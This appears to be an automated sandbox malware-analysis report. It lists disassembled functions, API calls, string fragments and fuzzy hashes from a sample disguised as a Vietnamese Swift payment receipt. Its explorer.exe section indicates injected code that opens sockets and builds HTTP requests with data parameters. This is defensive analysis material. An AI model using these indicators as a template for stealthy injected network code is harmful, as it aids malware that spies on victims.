Source File: 00000004.00000002.2229987491.00000000011B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 011B0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_11b0000_Bien nhan thanh toan Swift Message 38579130 VND8509509220_pdf.jbxd

Similarity

API ID: ___swprintf_l
String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
API String ID: 48624451-2108815105
Opcode ID: e06cda1a7e01bad4945718a2e39b6c5a726edcd46c92fd916230b2e7d18690ac
Instruction ID: ed698deb2e0b7a56a463486b76366eb20d1fa665e36c50e30c3aafec6d6a2e72
Opcode Fuzzy Hash: e06cda1a7e01bad4945718a2e39b6c5a726edcd46c92fd916230b2e7d18690ac
Instruction Fuzzy Hash: 4B5106B5A20646FFCF38DF9DD89097FBBF8EB44200B048459E596D7682E6B4DA008760

Function 01217630 Relevance: 14.2, APIs: 1, Strings: 7, Instructions: 194COMMON

Download Yara Rule

Strings

CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ, xrefs: 01254725
CLIENT(ntdll): Processing %ws for patching section protection for %wZ, xrefs: 01254742
CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions, xrefs: 01254655
ExecuteOptions, xrefs: 012546A0
Execute=1, xrefs: 01254713
CLIENT(ntdll): Processing section info %ws..., xrefs: 01254787
CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database, xrefs: 012546FC

Memory Dump Source

Source File: 00000004.00000002.2229987491.00000000011B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 011B0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_11b0000_Bien nhan thanh toan Swift Message 38579130 VND8509509220_pdf.jbxd

Similarity

API ID:
String ID: CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions$CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ$CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database$CLIENT(ntdll): Processing %ws for patching section protection for %wZ$CLIENT(ntdll): Processing section info %ws...$Execute=1$ExecuteOptions
API String ID: 0-484625025
Opcode ID: 781c3c8c7eeb299b6b23f58a4c07c4faa3747e95e4a9260a66a71f4e6d670331
Instruction ID: 39c7dd7991a4bc7a1ac68de33d4a641689aace9e1452ff111607ed4689fafd45
Opcode Fuzzy Hash: 781c3c8c7eeb299b6b23f58a4c07c4faa3747e95e4a9260a66a71f4e6d670331
Instruction Fuzzy Hash: 37515C3166025ABEEF14EBA9EC95FBD77ECEF64700F0404ADDA05A7181E7709A418F50

Function 012B6940 Relevance: 9.4, APIs: 6, Instructions: 416COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2229987491.00000000011B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 011B0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_11b0000_Bien nhan thanh toan Swift Message 38579130 VND8509509220_pdf.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2a48bdd4d8ea14c469ad441b94cf96c101b09c67394ceba66eb56f2a3b9e53c1
Instruction ID: 508f2be3b0f60fb6dbbcb90bbe5d512dada8968ebbca460b2a1f689014b58605
Opcode Fuzzy Hash: 2a48bdd4d8ea14c469ad441b94cf96c101b09c67394ceba66eb56f2a3b9e53c1
Instruction Fuzzy Hash: CE021471528342AFD705CF18C494AAFBBE5EFC8740F048A2DFA895B264DB31E945CB52

Function 0122B5EC Relevance: 9.0, APIs: 1, Strings: 4, Instructions: 238COMMON

Download Yara Rule

APIs

__aulldvrm.LIBCMT ref: 0122B6BF

Strings

0, xrefs: 0122B66F
0, xrefs: 0122B695
-, xrefs: 0122B650
+, xrefs: 0122B65A

Memory Dump Source

Source File: 00000004.00000002.2229987491.00000000011B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 011B0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_11b0000_Bien nhan thanh toan Swift Message 38579130 VND8509509220_pdf.jbxd

Similarity

API ID: __aulldvrm
String ID: +$-$0$0
API String ID: 1302938615-699404926
Opcode ID: 53abcd45f1248799eb7edd6da4205106d70e70754ef1e870ff48280e40c18d32
Instruction ID: 7074b342fa88e27805d337619a881b1b49c21c74d304ec1448b022112c956570
Opcode Fuzzy Hash: 53abcd45f1248799eb7edd6da4205106d70e70754ef1e870ff48280e40c18d32
Instruction Fuzzy Hash: D781E431E3526ABEEF29CE6CC8917FEBBB1AF45320F184119DA61A72D1C7748840CB51

Function 012920E0 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 84COMMON

Download Yara Rule

APIs

___swprintf_l.LIBCMT ref: 0129214F
___swprintf_l.LIBCMT ref: 01292172

Strings

]:%u, xrefs: 01292169
%%%u, xrefs: 01292146
[, xrefs: 0129212B

Memory Dump Source

Source File: 00000004.00000002.2229987491.00000000011B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 011B0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_11b0000_Bien nhan thanh toan Swift Message 38579130 VND8509509220_pdf.jbxd

Similarity

API ID: ___swprintf_l
String ID: %%%u$[$]:%u
API String ID: 48624451-2819853543
Opcode ID: 5fdf61293a3b7116f91026464dbd1d3b5520284bf4dd73342e24bb8505bc3bfc
Instruction ID: e5bc3456887895a2c069ade97524a973e0e28cc07b04612f38ef4f30e6993ce2
Opcode Fuzzy Hash: 5fdf61293a3b7116f91026464dbd1d3b5520284bf4dd73342e24bb8505bc3bfc
Instruction Fuzzy Hash: 1D2153BAA2011AABDB10DF6DD840ABEBBE8AF54654F040116EA05E3201E730D9118BA1

Function 0120F5B0 Relevance: 7.4, APIs: 1, Strings: 3, Instructions: 382COMMON

Download Yara Rule

Strings

RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 012502BD
RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 012502E7
RTL: Re-Waiting, xrefs: 0125031E

Memory Dump Source

Source File: 00000004.00000002.2229987491.00000000011B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 011B0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_11b0000_Bien nhan thanh toan Swift Message 38579130 VND8509509220_pdf.jbxd

Similarity

API ID:
String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u$RTL: Re-Waiting
API String ID: 0-2474120054
Opcode ID: 08143a1026032b8c70ea413cf620a297200a47accafa3aa30c34bce4ec65beb9
Instruction ID: 004cc09b58b0bc3fa5be44567cbee1dfcfb113b9012fcc3e0e5d746d6c199476
Opcode Fuzzy Hash: 08143a1026032b8c70ea413cf620a297200a47accafa3aa30c34bce4ec65beb9
Instruction Fuzzy Hash: BDE1B030664742DFD726CF28C985B2ABBE0BB84314F144A1DFAA5CB2E2D774D945CB42

Function 0121BED0 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 129COMMON

Download Yara Rule

Strings

RTL: Re-Waiting, xrefs: 01257BAC
RTL: Acquire Exclusive Sem Timeout %d (%I64u secs), xrefs: 01257B7F
RTL: Resource at %p, xrefs: 01257B8E

Memory Dump Source

Source File: 00000004.00000002.2229987491.00000000011B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 011B0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_11b0000_Bien nhan thanh toan Swift Message 38579130 VND8509509220_pdf.jbxd

Similarity

API ID:
String ID: RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
API String ID: 0-871070163
Opcode ID: 2488c861745ec4fb0d21453938d3e28d513e691e6b099ed40e6f2cae7a8971b9
Instruction ID: a7257c4361ba55e0d1a682061d09fc4d07c7bd9b1dc56b9806b891579fb3e9ff
Opcode Fuzzy Hash: 2488c861745ec4fb0d21453938d3e28d513e691e6b099ed40e6f2cae7a8971b9
Instruction Fuzzy Hash: E641C2317617039FD724DE29C841B6AB7F5EFA8710F100A1DFA56DB680DB71E8058B91

Function 0121B4C0 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 121COMMON

Download Yara Rule

APIs

__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0125728C

Strings

RTL: Acquire Shared Sem Timeout %d(%I64u secs), xrefs: 01257294
RTL: Re-Waiting, xrefs: 012572C1
RTL: Resource at %p, xrefs: 012572A3

Memory Dump Source

Source File: 00000004.00000002.2229987491.00000000011B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 011B0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_11b0000_Bien nhan thanh toan Swift Message 38579130 VND8509509220_pdf.jbxd

Similarity

API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
String ID: RTL: Acquire Shared Sem Timeout %d(%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
API String ID: 885266447-605551621
Opcode ID: 1951679d5d1a3d4c231977e04dc07ddc1cc6c6bb6cce6c5816fe4276310ff5b9
Instruction ID: a529b63c735808e7f24160460bfdc389e33076c30e960811e136b4301fb309ad
Opcode Fuzzy Hash: 1951679d5d1a3d4c231977e04dc07ddc1cc6c6bb6cce6c5816fe4276310ff5b9
Instruction Fuzzy Hash: 8041E3317A0207ABD721DE29CC81B6AB7F5FBA4750F104619FE55EB280DB71E8428BD1

Function 01292300 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 90COMMON

Download Yara Rule

APIs

___swprintf_l.LIBCMT ref: 0129238D
___swprintf_l.LIBCMT ref: 012923B3

Strings

%%%u, xrefs: 01292384
]:%u, xrefs: 012923AA

Memory Dump Source

Source File: 00000004.00000002.2229987491.00000000011B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 011B0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_11b0000_Bien nhan thanh toan Swift Message 38579130 VND8509509220_pdf.jbxd

Similarity

API ID: ___swprintf_l
String ID: %%%u$]:%u
API String ID: 48624451-3050659472
Opcode ID: f4ff80d48d418eaf81586584e2be8490f55bcf1c901cb9c011f32c4817d9717b
Instruction ID: bc7c88baff06b1adaeebf1687acee44d3aea5473c07922cc80730c06c7da0211
Opcode Fuzzy Hash: f4ff80d48d418eaf81586584e2be8490f55bcf1c901cb9c011f32c4817d9717b
Instruction Fuzzy Hash: E7315472A20219EFDF24DF2DDC41BFE77F8EB54610F444559E949E3240EB30AA458BA4

Function 01227D61 Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 284COMMON

Download Yara Rule

APIs

__aulldvrm.LIBCMT ref: 01227E8B

Strings

+, xrefs: 01227DE8
-, xrefs: 01227DDD

Memory Dump Source

Source File: 00000004.00000002.2229987491.00000000011B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 011B0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_11b0000_Bien nhan thanh toan Swift Message 38579130 VND8509509220_pdf.jbxd

Similarity

API ID: __aulldvrm
String ID: +$-
API String ID: 1302938615-2137968064
Opcode ID: 0e72ee8b5e9315034f2b46ff5b251d52fedc42f24a18d50ff17db184198f4ea1
Instruction ID: 90a84ad80e6986eb25ef25aa2b3d96519bbbfa77cb2a6953997133c378befc15
Opcode Fuzzy Hash: 0e72ee8b5e9315034f2b46ff5b251d52fedc42f24a18d50ff17db184198f4ea1
Instruction Fuzzy Hash: F791D871E28237BBDB24DF6DC881ABEBBA5BF64320F14451AEA55E72C0D774C9408721

Function 011E9126 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 199COMMON

Download Yara Rule

Strings

$, xrefs: 011E9191
@, xrefs: 011E9175

Memory Dump Source

Source File: 00000004.00000002.2229987491.00000000011B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 011B0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_11b0000_Bien nhan thanh toan Swift Message 38579130 VND8509509220_pdf.jbxd

Similarity

API ID:
String ID: $$@
API String ID: 0-1194432280
Opcode ID: bc6c142c320df1043156639dece1bc48aa5ce3768b8a802ab9624fec9844164f
Instruction ID: 70888d485180947530f59349042719a8f97dafb5420140549adf5d1b4d4be4d8
Opcode Fuzzy Hash: bc6c142c320df1043156639dece1bc48aa5ce3768b8a802ab9624fec9844164f
Instruction Fuzzy Hash: 1B811B71D1026ADBDB39DB94DC44BEEB6B4AB48754F0041DAEA19B7280D7709E84CFA0

Function 0126CEA0 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 134COMMON

Download Yara Rule

APIs

@_EH4_CallFilterFunc@8.LIBCMT ref: 0126CFBD

Strings

@4Cw@4Cw, xrefs: 0126CFD5, 0126CFDA, 0126CFF1
@, xrefs: 0126CF0A

Memory Dump Source

Source File: 00000004.00000002.2229987491.00000000011B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 011B0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_11b0000_Bien nhan thanh toan Swift Message 38579130 VND8509509220_pdf.jbxd

Similarity

API ID: CallFilterFunc@8
String ID: @$@4Cw@4Cw
API String ID: 4062629308-3101775584
Opcode ID: 61cafbf6f193f56da610561baf25bdc80b28aef568c3738b0859f0288807be05
Instruction ID: 01498065af20635e0992906cd8284ed9cab6ef9af3ed862a5b0b36631de66780
Opcode Fuzzy Hash: 61cafbf6f193f56da610561baf25bdc80b28aef568c3738b0859f0288807be05
Instruction Fuzzy Hash: AB41D1B1E2021ADFDB21DF99D940AADBBB8FF54714F00402EEA55DB294D774C841CB61

Analysis Process: explorer.exePID: 4004, Parent PID: 1364COMMON

Execution Graph

Execution Coverage:	2.3%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	4.7%
Total number of Nodes:	444
Total number of Limit Nodes:	15

Executed Functions

Function 1158FF82 Relevance: 23.6, APIs: 3, Strings: 10, Instructions: 815
networkCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

getaddrinfo.WS2_32 ref: 1159012E
setsockopt.WS2_32 ref: 11590830
recv.WS2_32 ref: 11590859

Strings

GET , xrefs: 11590318
&sql, xrefs: 11590471
tion, xrefs: 11590331
Co, xrefs: 11590323
: cl, xrefs: 11590338
&un=, xrefs: 115904F1
dat=, xrefs: 11590290
&br=, xrefs: 11590509
nnec, xrefs: 1159032A
ose, xrefs: 1159033F

Memory Dump Source

Source File: 00000006.00000002.3376444530.0000000011550000.00000040.80000000.00040000.00000000.sdmp, Offset: 11550000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_11550000_explorer.jbxd

Similarity

API ID: getaddrinforecvsetsockopt
String ID: Co$&br=$&sql$&un=$: cl$GET $dat=$nnec$ose$tion
API String ID: 1564272048-1117930895
Opcode ID: 5de8858bceb6b52e8c11e308410fa1d1098ae4878da76a5e8b5a3db0c78a0a43
Instruction ID: 1dd015484318f407797f9a3fe2afb62cbd52e6a879bb588f5b3d281efdcd22fb
Opcode Fuzzy Hash: 5de8858bceb6b52e8c11e308410fa1d1098ae4878da76a5e8b5a3db0c78a0a43
Instruction Fuzzy Hash: AA527D34614A4D8BDB59EF68C4847EEB7E5FB94304F504A6EC4AFCB142EE30A545CB82

Function 1158F232 Relevance: 4.1, APIs: 1, Strings: 1, Instructions: 642
filenativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

NtCreateFile.NTDLL ref: 1158F449

Strings

`, xrefs: 1158F41D

Memory Dump Source

Source File: 00000006.00000002.3376444530.0000000011550000.00000040.80000000.00040000.00000000.sdmp, Offset: 11550000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_11550000_explorer.jbxd

Similarity

API ID: CreateFile
String ID: `
API String ID: 823142352-2679148245
Opcode ID: de128a41b66c8ec8222e6cdebfc92e8119e2b93de7d93fbb6a18759800a4d987
Instruction ID: 96c9af357d4863f2af39e8ee14cfa83c01bf2a07477a9ccbc04151c04fee552a
Opcode Fuzzy Hash: de128a41b66c8ec8222e6cdebfc92e8119e2b93de7d93fbb6a18759800a4d987
Instruction Fuzzy Hash: 53224770A18B0A9FDB49DF29C4986AEB7E1FB9C305F50062EE55ED3250DF30A451CB82

Function 11590E12 Relevance: 1.6, APIs: 1, Instructions: 59
nativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

NtProtectVirtualMemory.NTDLL ref: 11590E67

Memory Dump Source

Source File: 00000006.00000002.3376444530.0000000011550000.00000040.80000000.00040000.00000000.sdmp, Offset: 11550000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_11550000_explorer.jbxd

Similarity

API ID: MemoryProtectVirtual
String ID:
API String ID: 2706961497-0
Opcode ID: 8fde5b3aa229c20c01e10f6c0a0911328a1d50ad6ca7dd15efa95d0be41baddf
Instruction ID: 000cd4420a14be811e6e394bef5db0e71b3a3f629b17cf81e898104a03d38fb8
Opcode Fuzzy Hash: 8fde5b3aa229c20c01e10f6c0a0911328a1d50ad6ca7dd15efa95d0be41baddf
Instruction Fuzzy Hash: 6C019E34628B884F8788EF6C948022AB7E4FBDD214F000B3EA99AC3250EB60C5414752

Function 11590E0A Relevance: 1.6, APIs: 1, Instructions: 52
nativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

NtProtectVirtualMemory.NTDLL ref: 11590E67

Memory Dump Source

Source File: 00000006.00000002.3376444530.0000000011550000.00000040.80000000.00040000.00000000.sdmp, Offset: 11550000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_11550000_explorer.jbxd

Similarity

API ID: MemoryProtectVirtual
String ID:
API String ID: 2706961497-0
Opcode ID: d782dca5996f3574fd0c4455d89641a9bf745bba617b6185d934ac73d2235392
Instruction ID: 85dae5f613fd40db7204f20e8e1f1f311e60682eeafb87df9d41a49a574a7da1
Opcode Fuzzy Hash: d782dca5996f3574fd0c4455d89641a9bf745bba617b6185d934ac73d2235392
Instruction Fuzzy Hash: 6B01A23462CB884F8748EF2C94412A6B3E5FBCE314F000B3EE99AC3240DB21D5024782

Function 1158A8C2 Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 100
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

ObtainUserAgentString.URLMON ref: 1158A9A0

Strings

User-Agent: , xrefs: 1158A935, 1158A948
on.d, xrefs: 1158A902
urlmon.dll, xrefs: 1158A959
nt: , xrefs: 1158A91E

Memory Dump Source

Source File: 00000006.00000002.3376444530.0000000011550000.00000040.80000000.00040000.00000000.sdmp, Offset: 11550000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_11550000_explorer.jbxd

Similarity

API ID: AgentObtainStringUser
String ID: User-Agent: $nt: $on.d$urlmon.dll
API String ID: 2681117516-319646191
Opcode ID: fab8d4f3d63e7cb3a61fc22749300fb1f1c56e9464b264e147718cbb7a7b3fb5
Instruction ID: 7662109f2d99c0a5400014234366088b62cfdaa954e0ab4e5eb7201e7cbdfb8b
Opcode Fuzzy Hash: fab8d4f3d63e7cb3a61fc22749300fb1f1c56e9464b264e147718cbb7a7b3fb5
Instruction Fuzzy Hash: FD31D131614A5D8BCB04EFA9C8847EDB7E0FB98219F40022AD44ED7240EF749645C78A

Function 1158A8BE Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 94
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

ObtainUserAgentString.URLMON ref: 1158A9A0

Strings

User-Agent: , xrefs: 1158A935, 1158A948
on.d, xrefs: 1158A902
urlmon.dll, xrefs: 1158A959
nt: , xrefs: 1158A91E

Memory Dump Source

Source File: 00000006.00000002.3376444530.0000000011550000.00000040.80000000.00040000.00000000.sdmp, Offset: 11550000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_11550000_explorer.jbxd

Similarity

API ID: AgentObtainStringUser
String ID: User-Agent: $nt: $on.d$urlmon.dll
API String ID: 2681117516-319646191
Opcode ID: 89ed80dc1d123a3fdb33b1283e784163d7980008e053a39b7e2b7c015d122c3c
Instruction ID: 50b0e2e56cbcf0e14d527c3ec1fef5f719491a671ec9d3eeb04d61d1e0c40d6f
Opcode Fuzzy Hash: 89ed80dc1d123a3fdb33b1283e784163d7980008e053a39b7e2b7c015d122c3c
Instruction Fuzzy Hash: 9E21D234614A5D8BCB05EFA9C8847EDBBE0FF98219F40422AD45AD7240EF749645CB8A

Function 11586B66 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 148
synchronizationCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateMutexW.KERNEL32 ref: 11586CCA

Strings

kern, xrefs: 11586B99
el32, xrefs: 11586BA0
.dll, xrefs: 11586BCD

Memory Dump Source

Source File: 00000006.00000002.3376444530.0000000011550000.00000040.80000000.00040000.00000000.sdmp, Offset: 11550000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_11550000_explorer.jbxd

Similarity

API ID: CreateMutex
String ID: .dll$el32$kern
API String ID: 1964310414-1222553051
Opcode ID: 440592a6460f4a8a809c4e0f2019460d4d12f006c7151b444d4376acf3ab05fa
Instruction ID: 449d4c1f7384fc8006eae3c270ac8ecde5854cfd60199fbd66422900934ea83b
Opcode Fuzzy Hash: 440592a6460f4a8a809c4e0f2019460d4d12f006c7151b444d4376acf3ab05fa
Instruction Fuzzy Hash: 7B415A74918A1C8FDB44EFA8C8D57AD77E0FBA8304F00457AC84EDB255EE309945CB96

Function 11586B72 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 138
synchronizationCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateMutexW.KERNEL32 ref: 11586CCA

Strings

kern, xrefs: 11586B99
el32, xrefs: 11586BA0
.dll, xrefs: 11586BCD

Memory Dump Source

Source File: 00000006.00000002.3376444530.0000000011550000.00000040.80000000.00040000.00000000.sdmp, Offset: 11550000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_11550000_explorer.jbxd

Similarity

API ID: CreateMutex
String ID: .dll$el32$kern
API String ID: 1964310414-1222553051
Opcode ID: d29081eafe973aeb990ac80f5dcafeb95ade16b14a0ff6f6c0f9231c9beedf12
Instruction ID: b0f1a8199935269cece9f748ea85305cc863b2250425fddd89b9d8b3e48e1379
Opcode Fuzzy Hash: d29081eafe973aeb990ac80f5dcafeb95ade16b14a0ff6f6c0f9231c9beedf12
Instruction Fuzzy Hash: 1B413974918A1C8FDB84EFA8C4D9BAD77F0FBA8304F04416AC84EDB255DE30A945CB95

Function 1158C72E Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 52
networkCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

connect.WS2_32 ref: 1158C791

Strings

conn, xrefs: 1158C75A
ect, xrefs: 1158C761

Memory Dump Source

Source File: 00000006.00000002.3376444530.0000000011550000.00000040.80000000.00040000.00000000.sdmp, Offset: 11550000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_11550000_explorer.jbxd

Similarity

API ID: connect
String ID: conn$ect
API String ID: 1959786783-716201944
Opcode ID: d2c20d592f91275318b70c66aa45ff63ae11574d98dcf1710f59c05c574d9bfb
Instruction ID: 6f62fbb499ebb164d15e16d2be859a5a62c7d00a9ba5abef73b9bf973b8e4a6b
Opcode Fuzzy Hash: d2c20d592f91275318b70c66aa45ff63ae11574d98dcf1710f59c05c574d9bfb
Instruction Fuzzy Hash: 6D011E74618B188FCB84EF5CE088B55B7E0FB69314F1545AED90DCB266C774D9818BC2

Function 1158C732 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 51
networkCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

connect.WS2_32 ref: 1158C791

Strings

conn, xrefs: 1158C75A
ect, xrefs: 1158C761

Memory Dump Source

Source File: 00000006.00000002.3376444530.0000000011550000.00000040.80000000.00040000.00000000.sdmp, Offset: 11550000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_11550000_explorer.jbxd

Similarity

API ID: connect
String ID: conn$ect
API String ID: 1959786783-716201944
Opcode ID: 640b8c0ab7b1bb3acdb51d34daf9cec4a3878eee67c7b90e610521ed962b484b
Instruction ID: e04c53b1b7ab9d7681382772b38633e3f25b4e1bc73fbc3ea17aa97eae824bdf
Opcode Fuzzy Hash: 640b8c0ab7b1bb3acdb51d34daf9cec4a3878eee67c7b90e610521ed962b484b
Instruction Fuzzy Hash: EE012C70618A1C8FCB84EF5CE088B55B7E0FB59314F1541AEA90DCB226CB74D9818BC2

Function 1158C6B2 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 53
networkCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

send.WS2_32 ref: 1158C713

Strings

send, xrefs: 1158C6DA

Memory Dump Source

Source File: 00000006.00000002.3376444530.0000000011550000.00000040.80000000.00040000.00000000.sdmp, Offset: 11550000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_11550000_explorer.jbxd

Similarity

API ID: send
String ID: send
API String ID: 2809346765-2809346765
Opcode ID: bba6785c5ab04fc1c912927f20b2eaf94db183ef6292e2548e0bd7e75e2cf9a2
Instruction ID: 86c278b6ac8afa3886afd29c4a76550917d8ebba5dbed04fb1e71d9a9f03bfaf
Opcode Fuzzy Hash: bba6785c5ab04fc1c912927f20b2eaf94db183ef6292e2548e0bd7e75e2cf9a2
Instruction Fuzzy Hash: D8011270518A598FDBC4EF1CD048B1577E0EB58314F1545AED85DCB266C670D8818B85

Function 1158C5B2 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 49
networkCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

socket.WS2_32 ref: 1158C611

Strings

sock, xrefs: 1158C5D9

Memory Dump Source

Source File: 00000006.00000002.3376444530.0000000011550000.00000040.80000000.00040000.00000000.sdmp, Offset: 11550000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_11550000_explorer.jbxd

Similarity

API ID: socket
String ID: sock
API String ID: 98920635-2415254727
Opcode ID: 205056058728d72a76f2a9c444eb1655fc63b7523a02cb36171bec795444162f
Instruction ID: 4067e59e853b0562053042f95e63ebfaa29f99c3f55f39e3ff2a2751e116b6cf
Opcode Fuzzy Hash: 205056058728d72a76f2a9c444eb1655fc63b7523a02cb36171bec795444162f
Instruction Fuzzy Hash: F2014F70618A1C8FCB84EF1DE048B54BBE0FB59314F1545AEE85EDB266C7B0D981CB86

Function 115842DD Relevance: 1.6, APIs: 1, Instructions: 91
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

SleepEx.KERNEL32 ref: 1158432D

Memory Dump Source

Source File: 00000006.00000002.3376444530.0000000011550000.00000040.80000000.00040000.00000000.sdmp, Offset: 11550000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_11550000_explorer.jbxd

Similarity

API ID: Sleep
String ID:
API String ID: 3472027048-0
Opcode ID: 2c485226c71f8ce073f7c86c27236fb263c26e76649b5794a31fce9b42c1bba6
Instruction ID: 082d4dd9d016de4b8388134f416db1fa3479af4c4b0ce35e1f91aa53bf6b8223
Opcode Fuzzy Hash: 2c485226c71f8ce073f7c86c27236fb263c26e76649b5794a31fce9b42c1bba6
Instruction Fuzzy Hash: 1D316B74614B4ADFDB54DF2A8088399BBA0FB54305F44427ECD2DCA106CB30A490CF92

Function 11584412 Relevance: 1.5, APIs: 1, Instructions: 46
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateThread.KERNEL32 ref: 11584461

Memory Dump Source

Source File: 00000006.00000002.3376444530.0000000011550000.00000040.80000000.00040000.00000000.sdmp, Offset: 11550000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_11550000_explorer.jbxd

Similarity

API ID: CreateThread
String ID:
API String ID: 2422867632-0
Opcode ID: 86dfbf082f461ee8d50c48ad175151c38d579804c722c71aa6313b9ca1572f48
Instruction ID: 84358909a8e54134fd26966bcef6d2528578adf89a5a5338a89b198fe29ef550
Opcode Fuzzy Hash: 86dfbf082f461ee8d50c48ad175151c38d579804c722c71aa6313b9ca1572f48
Instruction Fuzzy Hash: 12F0C234268A4D4FD788EB2CD48563AB7D0EBE8214F41463EA94DC3264DA29D5828716

Non-executed Functions

Function 10A52D02 Relevance: 14.2, Strings: 11, Instructions: 404COMMON

Download Yara Rule

Strings

ll, xrefs: 10A52F13
wini, xrefs: 10A52F72
kern, xrefs: 10A52F5A
user, xrefs: 10A52F03
S, xrefs: 10A53073
M, xrefs: 10A53082
.dll, xrefs: 10A52F2F
net., xrefs: 10A52F44
dll, xrefs: 10A52F4C
el32, xrefs: 10A52F27
32.d, xrefs: 10A52F0B

Memory Dump Source

Source File: 00000006.00000002.3374776077.0000000010950000.00000040.00000001.00040000.00000000.sdmp, Offset: 10950000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_10950000_explorer.jbxd

Similarity

API ID:
String ID: .dll$32.d$M$S$dll$el32$kern$ll$net.$user$wini
API String ID: 0-393284711
Opcode ID: 666e7131670ab6034242d7bb31114c5afc39a2cef586e73e73495a4832ac64d3
Instruction ID: 84770e956845c0365060e736447b21af40e330d35f677e2b5dd0b21c612320ed
Opcode Fuzzy Hash: 666e7131670ab6034242d7bb31114c5afc39a2cef586e73e73495a4832ac64d3
